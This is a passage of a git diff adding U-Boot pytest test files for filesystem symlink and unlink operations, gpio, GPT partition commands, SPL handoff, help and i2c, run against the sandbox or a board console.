ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s ' % (MEDIUM_FILE, SMALL_FILE), + 'ln host 0:0 %s /%s.link ' % (MEDIUM_FILE, MEDIUM_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + output = ubman.run_command_list([ + 'ln host 0:0 %s.link /%s ' % (MEDIUM_FILE, SMALL_FILE), + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink4(self, ubman, fs_obj_symlink): + """ + Test Case 4 - create a broken link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + + output = ubman.run_command_list([ + 'setenv filesize', + 'ln host 0:0 nowhere /link ', + ]) + assert('' in ''.join(output)) + + output = ubman.run_command( + '%sload host 0:0 %x /link' % + (fs_type, ADDR)) + with ubman.disable_check('error_notification'): + output = ubman.run_command('printenv filesize') + assert('"filesize" not defined' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_unlink.py b/test/py/tests/test_fs/test_unlink.py new file mode 100644 index 00000000000..7e911f02413 --- /dev/null +++ b/test/py/tests/test_fs/test_unlink.py @@ -0,0 +1,118 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:unlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestUnlink(object): + def test_unlink1(self, ubman, fs_obj_unlink): + """ + Test Case 1 - delete a file + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 1 - unlink (file)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/file1' % fs_type, + '%sls host 0:0 dir1/file1' % fs_type]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1/' % fs_type) + assert(not 'file1' in output) + assert('file2' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink2(self, ubman, fs_obj_unlink): + """ + Test Case 2 - delete many files + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 2 - unlink (many)'): + output = ubman.run_command('host bind 0 %s' % fs_img) + + for i in range(0, 20): + output = ubman.run_command_list([ + '%srm host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i), + '%sls host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i)]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir2' % fs_type) + assert('0 file(s), 2 dir(s)' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink3(self, ubman, fs_obj_unlink): + """ + Test Case 3 - trying to delete a non-existing file should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 3 - unlink (non-existing)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/nofile' % fs_type]) + assert('nofile: doesn\'t exist' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink4(self, ubman, fs_obj_unlink): + """ + Test Case 4 - delete an empty directory + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 4 - unlink (directory)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir4' % fs_type]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 /' % fs_type) + assert(not 'dir4' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink5(self, ubman, fs_obj_unlink): + """ + Test Case 5 - trying to deleting a non-empty directory ".." + should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 5 - unlink ("non-empty directory")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink6(self, ubman, fs_obj_unlink): + """ + Test Case 6 - trying to deleting a "." should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 6 - unlink (".")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/.' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink7(self, ubman, fs_obj_unlink): + """ + Test Case 7 - trying to deleting a ".." should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 7 - unlink ("..")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/..' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_gpio.py b/test/py/tests/test_gpio.py new file mode 100644 index 00000000000..46b674b7653 --- /dev/null +++ b/test/py/tests/test_gpio.py @@ -0,0 +1,315 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Adarsh Babu Kalepalli <opensource.kab@gmail.com> +# Copyright (c) 2020 Alex Kiernan <alex.kiernan@gmail.com> + +import pytest +import time +import utils + +""" + test_gpio_input is intended to test the fix 4dbc107f4683. + 4dbc107f4683:"cmd: gpio: Correct do_gpio() return value" +""" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input(ubman): + """Test that gpio input correctly returns the value of a gpio pin.""" + + response = ubman.run_command('gpio input 0; echo rc:$?') + expected_response = 'rc:0' + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; gpio input 0; echo rc:$?') + expected_response = 'rc:1' + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_exit_statuses(ubman): + """Test that non-input gpio commands correctly return the command + success/failure status.""" + + expected_response = 'rc:0' + response = ubman.run_command('gpio clear 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio set 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio status -a; echo rc:$?') + assert(expected_response in response) + + expected_response = 'rc:1' + response = ubman.run_command('gpio nonexistent-command; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio input 200; echo rc:$?') + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_read(ubman): + """Test that gpio read correctly sets the variable to the value of a gpio pin.""" + + ubman.run_command('gpio clear 0') + response = ubman.run_command('gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:0,rc:0' + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:1,rc:0' + assert(expected_response in response) + response = ubman.run_command('setenv var; gpio read var nonexistent-gpio; echo val:$var,rc:$?') + expected_response = 'val:,rc:1' + assert(expected_response in response) + +""" +Generic Tests for 'gpio' command on sandbox and real hardware. +The below sequence of tests rely on env__gpio_dev_config for configuration values of gpio pins. + + Configuration data for gpio command. + The set,clear,toggle ,input and status options of 'gpio' command are verified. + For sake of verification,A LED/buzzer could be connected to GPIO pins configured as O/P. + Logic level '1'/'0' can be applied onto GPIO pins configured as I/P + + +env__gpio_dev_config = { + #the number of 'gpio_str_x' strings should equal to + #'gpio_str_count' value + 'gpio_str_count':4 , + 'gpio_str_1': '0', + 'gpio_str_2': '31', + 'gpio_str_3': '63', + 'gpio_str_4': '127', + 'gpio_op_pin': '64', + 'gpio_ip_pin_set':'65', + 'gpio_ip_pin_clear':'66', + 'gpio_clear_value': 'value is 0', + 'gpio_set_value': 'value is 1', + # GPIO pin list to test gpio functionality for each pins, pin should be + # pin names (str) + 'gpio_pin_list': ['gpio@1000031', 'gpio@1000032', 'gpio@20000033'], + # GPIO input output list for shorted gpio pins to test gpio + # functionality for each of pairs, where the first element is + # configured as input and second as output + 'gpio_ip_op_list': [['gpio0', 'gpio1'], ['gpio2', 'gpio3']], +} +""" + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_status_all_generic(ubman): + """Test the 'gpio status' command. + + Displays all gpio pins available on the Board. + To verify if the status of pins is displayed or not, + the user can configure (gpio_str_count) and verify existence of certain + pins.The details of these can be configured in 'gpio_str_n'. + of boardenv_* (example above).User can configure any + number of such pins and mention that count in 'gpio_str_count'. + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_str_count = f['gpio_str_count'] + + #Display all the GPIO ports + cmd = 'gpio status -a' + response = ubman.run_command(cmd) + + for str_value in range(1,gpio_str_count + 1): + assert f["gpio_str_%d" %(str_value)] in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_set_generic(ubman): + """Test the 'gpio set' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'set' option + + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio set ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_clear_generic(ubman): + """Test the 'gpio clear' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'clear' option + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio clear ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_toggle_generic(ubman): + """Test the 'gpio toggle' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'toggle' option + """ + + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + gpio_clear_value = f['gpio_clear_value']; + + cmd = 'gpio set ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + cmd = 'gpio toggle ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input_generic(ubman): + """Test the 'gpio input' command. + + Specific gpio pins configured by user as input + (mentioned in gpio_ip_pin_set and gpio_ip_pin_clear) + is verified for logic '1' and logic '0' states + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_ip_pin_clear']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + + gpio_pin_adr = f['gpio_ip_pin_set']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_generic(ubman): + """Test various gpio related functionality, such as the input, set, clear, + and toggle for the set of gpio pin list. + + Specific set of gpio pins (by mentioning gpio pin name) configured as + input (mentioned as 'gpio_pin_list') to be tested for multiple gpio + commands. + """ + + f = ubman.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_pin_list', None) + if not gpio_pins: + pytest.skip('gpio pin list are not configured') + + for gpin in gpio_pins: + # gpio input + ubman.run_command(f'gpio input {gpin}') + expected_response = f'{gpin}: input:' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio set + ubman.run_command(f'gpio set {gpin}') + expected_response = f'{gpin}: output: 1' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio clear + ubman.run_command(f'gpio clear {gpin}') + expected_response = f'{gpin}: output: 0' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio toggle + ubman.run_command(f'gpio toggle {gpin}') + expected_response = f'{gpin}: output: 1' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_input_output_generic(ubman): + """Test gpio related functionality such as input and output for the list of + shorted gpio pins provided as a pair of input and output pins. This test + will fail, if the gpio pins are not shorted properly. + + Specific set of shorted gpio pins (by mentioning gpio pin name) + configured as input and output (mentioned as 'gpio_ip_op_list') as a + pair to be tested for gpio input output case. + """ + + f = ubman.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_ip_op_list', None) + if not gpio_pins: + pytest.skip('gpio pin list for input and output are not configured') + + for gpins in gpio_pins: + ubman.run_command(f'gpio input {gpins[0]}') + expected_response = f'{gpins[0]}: input:' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + ubman.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[1]}: output:' + response = ubman.run_command(f'gpio status -a {gpins[1]}') + assert expected_response in response + + ubman.run_command(f'gpio clear {gpins[1]}') + expected_response = f'{gpins[0]}: input: 0' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + ubman.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[0]}: input: 1' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response diff --git a/test/py/tests/test_gpt.py b/test/py/tests/test_gpt.py new file mode 100644 index 00000000000..cfc8f1319a9 --- /dev/null +++ b/test/py/tests/test_gpt.py @@ -0,0 +1,350 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017 Alison Chaiken +# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved. + +# Test GPT manipulation commands. + +import os +import pytest +import utils + +""" +These tests rely on a 4 MB disk image, which is automatically created by +the test. +""" + +# Mark all tests here as slow +pytestmark = pytest.mark.slow + +def parse_gpt_parts(disk_str): + """Parser a partition string into a list of partitions. + + Args: + disk_str: The disk description string, as returned by `gpt read` + + Returns: + A list of parsed partitions. Each partition is a dictionary with the + string value from each specified key in the partition description, or a + key with with the value True for a boolean flag + """ + parts = [] + for part_str in disk_str.split(';'): + part = {} + for option in part_str.split(","): + if not option: + continue + + if "=" in option: + key, value = option.split("=") + part[key] = value + else: + part[option] = True + + if part: + parts.append(part) + + return parts + +class GptTestDiskImage(object): + """Disk Image used by the GPT tests.""" + + def __init__(self, ubman): + """Initialize a new GptTestDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_gpt_disk_image.bin' + + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 4194304) + os.close(fd) + cmd = ('sgdisk', + '--disk-guid=375a56f7-d6c9-4e81-b5f0-09d41ca89efe', + persistent) + utils.run_and_log(ubman, cmd) + # part1 offset 1MB size 1MB + cmd = ('sgdisk', '--new=1:2048:4095', '--change-name=1:part1', + '--partition-guid=1:33194895-67f6-4561-8457-6fdeed4f50a3', + '-A 1:set:2', + persistent) + # part2 offset 2MB size 1.5MB + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--new=2:4096:7167', '--change-name=2:part2', + '--partition-guid=2:cc9c6e4a-6551-4cb5-87be-3210f96c86fb', + persistent) + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +@pytest.fixture(scope='function') +def state_disk_image(ubman): + """pytest fixture to provide a GptTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. A new disk is returned each time to prevent tests from + interfering with each other.""" + + return GptTestDiskImage(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read(state_disk_image, ubman): + """Test the gpt read command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt read host 0') + assert 'Start 1MiB, size 1MiB' in output + assert 'Block size 512, name part1' in output + assert 'Start 2MiB, size 1MiB' in output + assert 'Block size 512, name part2' in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('partition_type_guid') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read_var(state_disk_image, ubman): + """Test the gpt read command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt read host 0 gpt_parts') + assert 'success!' in output + + output = ubman.run_command('echo ${gpt_parts}') + parts = parse_gpt_parts(output.rstrip()) + + assert parts == [ + { + "uuid_disk": "375a56f7-d6c9-4e81-b5f0-09d41ca89efe", + }, + { + "name": "part1", + "start": "0x100000", + "size": "0x100000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "33194895-67f6-4561-8457-6fdeed4f50a3", + "bootable": True, + }, + { + "name": "part2", + "start": "0x200000", + "size": "0x180000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "cc9c6e4a-6551-4cb5-87be-3210f96c86fb", + }, + ] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_verify(state_disk_image, ubman): + """Test the gpt verify command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt verify host 0') + assert 'Verify GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_repair(state_disk_image, ubman): + """Test the gpt repair command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt repair host 0') + assert 'Repairing GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_guid(state_disk_image, ubman): + """Test the gpt guid command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_setenv(state_disk_image, ubman): + """Test the gpt setenv command.""" + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt setenv host 0 part1') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '800' + output = ubman.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == '800' + output = ubman.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part1' + output = ubman.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '1' + output = ubman.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '1' + + output = ubman.run_command('gpt setenv host 0 part2') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '1000' + output = ubman.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == 'c00' + output = ubman.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part2' + output = ubman.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '2' + output = ubman.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_save_guid(state_disk_image, ubman): + """Test the gpt guid command to save GUID into a string.""" + + if ubman.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt guid host 0 newguid') + output = ubman.run_command('printenv newguid') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_uuid(state_disk_image, ubman): + """Test the gpt partittion type UUID command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part type host 0:1') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_save_uuid(state_disk_image, ubman): + """Test the gpt partittion type to save UUID into a string.""" + + if ubman.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part type host 0:1 newguid') + output = ubman.run_command('printenv newguid') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_rename_partition(state_disk_image, ubman): + """Test the gpt rename command to write partition names.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + ubman.run_command('gpt rename host 0 1 first') + output = ubman.run_command('gpt read host 0') + assert 'name first' in output + ubman.run_command('gpt rename host 0 2 second') + output = ubman.run_command('gpt read host 0') + assert 'name second' in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_swap_partitions(state_disk_image, ubman): + """Test the gpt swap command to exchange two partition names.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + ubman.run_command('gpt swap host 0 part1 part2') + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part2"' in output + assert '0x00001000 0x00001bff "part1"' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_set_bootable(state_disk_image, ubman): + """Test the gpt set-bootable command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + parts = ('part2', 'part1') + for bootable in parts: + output = ubman.run_command(f'gpt set-bootable host 0 {bootable}') + assert 'success!' in output + + for p in parts: + output = ubman.run_command(f'gpt setenv host 0 {p}') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_bootable}') + if p == bootable: + assert output.rstrip() == '1' + else: + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_write(state_disk_image, ubman): + """Test the gpt write command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt write host 0 "name=all,size=0"') + assert 'Writing GPT: success!' in output + output = ubman.run_command('part list host 0') + assert '0x00000022 0x00001fde "all"' in output + output = ubman.run_command('gpt write host 0 "uuid_disk=375a56f7-d6c9-4e81-b5f0-09d41ca89efe;name=first,start=1M,size=1M;name=second,start=0x200000,size=0x180000;"') + assert 'Writing GPT: success!' in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + output = ubman.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_transpose(state_disk_image, ubman): + """Test the gpt transpose command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part list host 0') + assert '1\t0x00000800\t0x00000fff\t"part1"' in output + assert '2\t0x00001000\t0x00001bff\t"part2"' in output + + output = ubman.run_command('gpt transpose host 0 1 2') + assert 'success!' in output + + output = ubman.run_command('part list host 0') + assert '2\t0x00000800\t0x00000fff\t"part1"' in output + assert '1\t0x00001000\t0x00001bff\t"part2"' in output diff --git a/test/py/tests/test_handoff.py b/test/py/tests/test_handoff.py new file mode 100644 index 00000000000..becd7d75cf7 --- /dev/null +++ b/test/py/tests/test_handoff.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest + +# Magic number to check that SPL handoff is working +TEST_HANDOFF_MAGIC = 0x14f93c7b + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl') +def test_handoff(ubman): + """Test that of-platdata can be generated and used in sandbox""" + response = ubman.run_command('sb handoff') + assert ('SPL handoff magic %x' % TEST_HANDOFF_MAGIC) in response diff --git a/test/py/tests/test_help.py b/test/py/tests/test_help.py new file mode 100644 index 00000000000..12cb36b7b98 --- /dev/null +++ b/test/py/tests/test_help.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest + +def test_help(ubman): + """Test that the "help" command can be executed.""" + + lines = ubman.run_command('help') + if ubman.config.buildconfig.get('config_cmd_2048', 'n') == 'y': + assert lines.splitlines()[0] == "2048 - The 2048 game" + else: + assert lines.splitlines()[0] == "? - alias for 'help'" + +@pytest.mark.boardspec('sandbox') +def test_help_no_devicetree(ubman): + try: + ubman.restart_uboot_with_flags([], use_dtb=False) + ubman.run_command('help') + output = ubman.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + ubman.restart_uboot() + +@pytest.mark.boardspec('sandbox_vpl') +def test_vpl_help(ubman): + try: + ubman.restart_uboot() + ubman.run_command('help') + output = ubman.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + ubman.restart_uboot() diff --git a/test/py/tests/test_i2c.py b/test/py/tests/test_i2c.py new file mode 100644 index 00000000000..69b11930ce7 --- /dev/null +++ b/test/py/tests/test_i2c.py @@ -0,0 +1,116 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the i2c device info including the bus list and eeprom address/value. This test +will be automatically skipped without this. + +For example: + +# Setup env__i2c_device_test to set the i2c bus list and probe_all boolean +# parameter. For i2c_probe_all_buses case, if probe_all parameter is set to +# False then it probes all the buses listed in bus_list instead of probing all +# the buses available. +env__i2c_device_test = { + 'bus_list': [0, 2, 5, 12, 16, 18], + 'probe_all': False, +} + +# Setup env__i2c_eeprom_device_test to set the i2c bus number, eeprom address +# and configured value for i2c_eeprom test case. Test will be skipped if +# env__i2c_eeprom_device_test is not set +env__i2c_eeprom_device_test = { + 'bus': 3, + 'eeprom_addr': 0x54, + 'eeprom_val': '30 31', +} +""" + +def get_i2c_test_env(ubman): + f = ubman.config.env.get("env__i2c_device_test", None) + if not f: + pytest.skip("No I2C device to test!") + else: + bus_list = f.get("bus_list", None) + if not bus_list: + pytest.skip("I2C bus list is not provided!") + probe_all = f.get("probe_all", False) + return bus_list, probe_all + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_bus(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = ubman.run_command("i2c bus") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_dev(ubman): + bus_list, probe = get_i2c_test_env(ubman) + expected_response = "Current bus is" + response = ubman.run_command("i2c dev") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe(ubman): + bus_list, probe = get_i2c_test_env(ubman) + bus = random.choice(bus_list) + expected_response = f"Setting bus to {bus}" + response = ubman.run_command(f"i2c dev {bus}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = ubman.run_command("i2c probe") + assert 